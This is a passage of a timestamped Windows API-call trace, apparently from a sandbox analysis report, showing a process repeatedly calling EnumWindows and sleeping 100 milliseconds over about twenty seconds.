(dwMilliseconds=0x64) [0280.934] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0280.934] Sleep (dwMilliseconds=0x64) [0281.010] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.011] Sleep (dwMilliseconds=0x64) [0281.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.107] Sleep (dwMilliseconds=0x64) [0281.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.199] Sleep (dwMilliseconds=0x64) [0281.530] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.531] Sleep (dwMilliseconds=0x64) [0281.669] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.670] Sleep (dwMilliseconds=0x64) [0281.812] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.813] Sleep (dwMilliseconds=0x64) [0281.877] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.878] Sleep (dwMilliseconds=0x64) [0281.922] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.922] Sleep (dwMilliseconds=0x64) [0281.966] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0281.967] Sleep (dwMilliseconds=0x64) [0282.030] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.030] Sleep (dwMilliseconds=0x64) [0282.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.108] Sleep (dwMilliseconds=0x64) [0282.222] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.222] Sleep (dwMilliseconds=0x64) [0282.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.296] Sleep (dwMilliseconds=0x64) [0282.390] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.390] Sleep (dwMilliseconds=0x64) [0282.464] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.468] Sleep (dwMilliseconds=0x64) [0282.515] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.515] Sleep (dwMilliseconds=0x64) [0282.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.561] Sleep (dwMilliseconds=0x64) [0282.623] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.624] Sleep (dwMilliseconds=0x64) [0282.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.718] Sleep (dwMilliseconds=0x64) [0282.811] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.811] Sleep (dwMilliseconds=0x64) [0282.938] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0282.939] Sleep (dwMilliseconds=0x64) [0283.029] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.030] Sleep (dwMilliseconds=0x64) [0283.057] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.058] Sleep (dwMilliseconds=0x64) [0283.108] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.108] Sleep (dwMilliseconds=0x64) [0283.137] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.138] Sleep (dwMilliseconds=0x64) [0283.155] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.155] Sleep (dwMilliseconds=0x64) [0283.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.201] Sleep (dwMilliseconds=0x64) [0283.284] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.285] Sleep (dwMilliseconds=0x64) [0283.348] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.348] Sleep (dwMilliseconds=0x64) [0283.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.452] Sleep (dwMilliseconds=0x64) [0283.530] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.530] Sleep (dwMilliseconds=0x64) [0283.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.623] Sleep (dwMilliseconds=0x64) [0283.672] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.675] Sleep (dwMilliseconds=0x64) [0283.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.717] Sleep (dwMilliseconds=0x64) [0283.754] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.754] Sleep (dwMilliseconds=0x64) [0283.762] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.763] Sleep (dwMilliseconds=0x64) [0283.826] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.827] Sleep (dwMilliseconds=0x64) [0283.935] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0283.936] Sleep (dwMilliseconds=0x64) [0284.015] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.015] Sleep (dwMilliseconds=0x64) [0284.252] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.253] Sleep (dwMilliseconds=0x64) [0284.656] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.657] Sleep (dwMilliseconds=0x64) [0284.708] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.709] Sleep (dwMilliseconds=0x64) [0284.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.717] Sleep (dwMilliseconds=0x64) [0284.754] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.755] Sleep (dwMilliseconds=0x64) [0284.802] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.805] Sleep (dwMilliseconds=0x64) [0284.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.870] Sleep (dwMilliseconds=0x64) [0284.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.918] Sleep (dwMilliseconds=0x64) [0284.961] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0284.962] Sleep (dwMilliseconds=0x64) [0285.047] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.048] Sleep (dwMilliseconds=0x64) [0285.130] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.133] Sleep (dwMilliseconds=0x64) [0285.182] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.184] Sleep (dwMilliseconds=0x64) [0285.235] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.236] Sleep (dwMilliseconds=0x64) [0285.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.248] Sleep (dwMilliseconds=0x64) [0285.288] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.292] Sleep (dwMilliseconds=0x64) [0285.336] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.336] Sleep (dwMilliseconds=0x64) [0285.340] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.340] Sleep (dwMilliseconds=0x64) [0285.389] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.389] Sleep (dwMilliseconds=0x64) [0285.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.482] Sleep (dwMilliseconds=0x64) [0285.561] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.561] Sleep (dwMilliseconds=0x64) [0285.603] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.629] Sleep (dwMilliseconds=0x64) [0285.676] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.676] Sleep (dwMilliseconds=0x64) [0285.834] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.837] Sleep (dwMilliseconds=0x64) [0285.891] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.892] Sleep (dwMilliseconds=0x64) [0285.943] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.943] Sleep (dwMilliseconds=0x64) [0285.986] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0285.986] Sleep (dwMilliseconds=0x64) [0286.046] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.047] Sleep (dwMilliseconds=0x64) [0286.132] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.137] Sleep (dwMilliseconds=0x64) [0286.234] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.235] Sleep (dwMilliseconds=0x64) [0286.314] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.315] Sleep (dwMilliseconds=0x64) [0286.359] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.359] Sleep (dwMilliseconds=0x64) [0286.399] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.400] Sleep (dwMilliseconds=0x64) [0286.499] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.500] Sleep (dwMilliseconds=0x64) [0286.544] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.545] Sleep (dwMilliseconds=0x64) [0286.590] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.591] Sleep (dwMilliseconds=0x64) [0286.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.683] Sleep (dwMilliseconds=0x64) [0286.733] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.734] Sleep (dwMilliseconds=0x64) [0286.849] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0286.850] Sleep (dwMilliseconds=0x64) [0287.015] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.017] Sleep (dwMilliseconds=0x64) [0287.092] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.092] Sleep (dwMilliseconds=0x64) [0287.183] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.187] Sleep (dwMilliseconds=0x64) [0287.240] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.241] Sleep (dwMilliseconds=0x64) [0287.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.279] Sleep (dwMilliseconds=0x64) [0287.324] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.324] Sleep (dwMilliseconds=0x64) [0287.419] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.420] Sleep (dwMilliseconds=0x64) [0287.499] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.499] Sleep (dwMilliseconds=0x64) [0287.562] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.563] Sleep (dwMilliseconds=0x64) [0287.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.855] Sleep (dwMilliseconds=0x64) [0287.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0287.982] Sleep (dwMilliseconds=0x64) [0288.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.168] Sleep (dwMilliseconds=0x64) [0288.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.261] Sleep (dwMilliseconds=0x64) [0288.371] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.372] Sleep (dwMilliseconds=0x64) [0288.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.481] Sleep (dwMilliseconds=0x64) [0288.621] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.622] Sleep (dwMilliseconds=0x64) [0288.770] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.776] Sleep (dwMilliseconds=0x64) [0288.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.887] Sleep (dwMilliseconds=0x64) [0288.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0288.965] Sleep (dwMilliseconds=0x64) [0288.999] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.000] Sleep (dwMilliseconds=0x64) [0289.043] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.047] Sleep (dwMilliseconds=0x64) [0289.140] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.140] Sleep (dwMilliseconds=0x64) [0289.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.296] Sleep (dwMilliseconds=0x64) [0289.405] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.405] Sleep (dwMilliseconds=0x64) [0289.479] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.484] Sleep (dwMilliseconds=0x64) [0289.516] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.516] Sleep (dwMilliseconds=0x64) [0289.558] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.561] Sleep (dwMilliseconds=0x64) [0289.597] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.598] Sleep (dwMilliseconds=0x64) [0289.604] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.605] Sleep (dwMilliseconds=0x64) [0289.670] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.670] Sleep (dwMilliseconds=0x64) [0289.763] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.764] Sleep (dwMilliseconds=0x64) [0289.874] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.875] Sleep (dwMilliseconds=0x64) [0289.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0289.952] Sleep (dwMilliseconds=0x64) [0290.020] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.022] Sleep (dwMilliseconds=0x64) [0290.049] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.050] Sleep (dwMilliseconds=0x64) [0290.062] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.063] Sleep (dwMilliseconds=0x64) [0290.093] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.093] Sleep (dwMilliseconds=0x64) [0290.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.140] Sleep (dwMilliseconds=0x64) [0290.208] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.209] Sleep (dwMilliseconds=0x64) [0290.263] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.264] Sleep (dwMilliseconds=0x64) [0290.405] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.406] Sleep (dwMilliseconds=0x64) [0290.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.546] Sleep (dwMilliseconds=0x64) [0290.609] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.609] Sleep (dwMilliseconds=0x64) [0290.675] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.676] Sleep (dwMilliseconds=0x64) [0290.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.730] Sleep (dwMilliseconds=0x64) [0290.780] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.780] Sleep (dwMilliseconds=0x64) [0290.880] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.881] Sleep (dwMilliseconds=0x64) [0290.937] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0290.937] Sleep (dwMilliseconds=0x64) [0291.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0291.042] Sleep (dwMilliseconds=0x64) [0291.140] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0291.140] Sleep (dwMilliseconds=0x64) [0291.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0291.356] Sleep (dwMilliseconds=0x64) [0291.574] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0291.574] Sleep (dwMilliseconds=0x64) [0291.817] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0291.818] Sleep (dwMilliseconds=0x64) [0291.937] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0291.937] Sleep (dwMilliseconds=0x64) [0292.032] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.033] Sleep (dwMilliseconds=0x64) [0292.086] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.086] Sleep (dwMilliseconds=0x64) [0292.148] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.149] Sleep (dwMilliseconds=0x64) [0292.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.202] Sleep (dwMilliseconds=0x64) [0292.243] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.244] Sleep (dwMilliseconds=0x64) [0292.291] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.291] Sleep (dwMilliseconds=0x64) [0292.351] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.352] Sleep (dwMilliseconds=0x64) [0292.371] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.373] Sleep (dwMilliseconds=0x64) [0292.415] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.415] Sleep (dwMilliseconds=0x64) [0292.434] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.434] Sleep (dwMilliseconds=0x64) [0292.468] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.468] Sleep (dwMilliseconds=0x64) [0292.506] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.507] Sleep (dwMilliseconds=0x64) [0292.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.589] Sleep (dwMilliseconds=0x64) [0292.633] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.634] Sleep (dwMilliseconds=0x64) [0292.685] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.686] Sleep (dwMilliseconds=0x64) [0292.732] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.732] Sleep (dwMilliseconds=0x64) [0292.937] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0292.938] Sleep (dwMilliseconds=0x64) [0293.016] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.017] Sleep (dwMilliseconds=0x64) [0293.046] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.046] Sleep (dwMilliseconds=0x64) [0293.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.140] Sleep (dwMilliseconds=0x64) [0293.170] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.171] Sleep (dwMilliseconds=0x64) [0293.183] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.187] Sleep (dwMilliseconds=0x64) [0293.234] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.234] Sleep (dwMilliseconds=0x64) [0293.280] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.281] Sleep (dwMilliseconds=0x64) [0293.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.327] Sleep (dwMilliseconds=0x64) [0293.372] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.373] Sleep (dwMilliseconds=0x64) [0293.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.433] Sleep (dwMilliseconds=0x64) [0293.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.480] Sleep (dwMilliseconds=0x64) [0293.527] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.528] Sleep (dwMilliseconds=0x64) [0293.632] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.633] Sleep (dwMilliseconds=0x64) [0293.678] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.682] Sleep (dwMilliseconds=0x64) [0293.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.796] Sleep (dwMilliseconds=0x64) [0293.821] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.822] Sleep (dwMilliseconds=0x64) [0293.884] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.885] Sleep (dwMilliseconds=0x64) [0293.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.952] Sleep (dwMilliseconds=0x64) [0293.997] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0293.998] Sleep (dwMilliseconds=0x64) [0294.038] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.041] Sleep (dwMilliseconds=0x64) [0294.090] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.090] Sleep (dwMilliseconds=0x64) [0294.142] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.143] Sleep (dwMilliseconds=0x64) [0294.187] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.187] Sleep (dwMilliseconds=0x64) [0294.205] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.206] Sleep (dwMilliseconds=0x64) [0294.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.217] Sleep (dwMilliseconds=0x64) [0294.242] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.246] Sleep (dwMilliseconds=0x64) [0294.287] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.287] Sleep (dwMilliseconds=0x64) [0294.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.356] Sleep (dwMilliseconds=0x64) [0294.393] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.393] Sleep (dwMilliseconds=0x64) [0294.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.481] Sleep (dwMilliseconds=0x64) [0294.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.558] Sleep (dwMilliseconds=0x64) [0294.633] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.634] Sleep (dwMilliseconds=0x64) [0294.689] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.689] Sleep (dwMilliseconds=0x64) [0294.747] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.749] Sleep (dwMilliseconds=0x64) [0294.813] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.814] Sleep (dwMilliseconds=0x64) [0294.931] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0294.932] Sleep (dwMilliseconds=0x64) [0295.031] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.031] Sleep (dwMilliseconds=0x64) [0295.123] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.123] Sleep (dwMilliseconds=0x64) [0295.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.328] Sleep (dwMilliseconds=0x64) [0295.440] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.441] Sleep (dwMilliseconds=0x64) [0295.627] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.627] Sleep (dwMilliseconds=0x64) [0295.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.746] Sleep (dwMilliseconds=0x64) [0295.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0295.886] Sleep (dwMilliseconds=0x64) [0296.057] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.058] Sleep (dwMilliseconds=0x64) [0296.138] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.139] Sleep (dwMilliseconds=0x64) [0296.230] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.231] Sleep (dwMilliseconds=0x64) [0296.326] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.326] Sleep (dwMilliseconds=0x64) [0296.497] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.584] Sleep (dwMilliseconds=0x64) [0296.636] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.637] Sleep (dwMilliseconds=0x64) [0296.733] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.733] Sleep (dwMilliseconds=0x64) [0296.785] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.785] Sleep (dwMilliseconds=0x64) [0296.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.796] Sleep (dwMilliseconds=0x64) [0296.855] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.856] Sleep (dwMilliseconds=0x64) [0296.906] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0296.907] Sleep (dwMilliseconds=0x64) [0297.034] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.035] Sleep (dwMilliseconds=0x64) [0297.138] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.138] Sleep (dwMilliseconds=0x64) [0297.315] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.316] Sleep (dwMilliseconds=0x64) [0297.488] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.488] Sleep (dwMilliseconds=0x64) [0297.585] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.586] Sleep (dwMilliseconds=0x64) [0297.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.746] Sleep (dwMilliseconds=0x64) [0297.892] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0297.893] Sleep (dwMilliseconds=0x64) [0298.025] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.025] Sleep (dwMilliseconds=0x64) [0298.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.250] Sleep (dwMilliseconds=0x64) [0298.406] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.407] Sleep (dwMilliseconds=0x64) [0298.512] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.512] Sleep (dwMilliseconds=0x64) [0298.605] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.609] Sleep (dwMilliseconds=0x64) [0298.687] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.688] Sleep (dwMilliseconds=0x64) [0298.701] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.702] Sleep (dwMilliseconds=0x64) [0298.719] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.719] Sleep (dwMilliseconds=0x64) [0298.788] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.789] Sleep (dwMilliseconds=0x64) [0298.887] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.888] Sleep (dwMilliseconds=0x64) [0298.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0298.952] Sleep (dwMilliseconds=0x64) [0299.046] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.047] Sleep (dwMilliseconds=0x64) [0299.126] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.127] Sleep (dwMilliseconds=0x64) [0299.171] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.171] Sleep (dwMilliseconds=0x64) [0299.234] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.235] Sleep (dwMilliseconds=0x64) [0299.280] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.280] Sleep (dwMilliseconds=0x64) [0299.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.344] Sleep (dwMilliseconds=0x64) [0299.451] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.452] Sleep (dwMilliseconds=0x64) [0299.505] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.505] Sleep (dwMilliseconds=0x64) [0299.563] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.563] Sleep (dwMilliseconds=0x64) [0299.670] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.671] Sleep (dwMilliseconds=0x64) [0299.765] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.766] Sleep (dwMilliseconds=0x64) [0299.933] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0299.934] Sleep (dwMilliseconds=0x64) [0300.051] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0300.052] Sleep (dwMilliseconds=0x64) [0300.134] 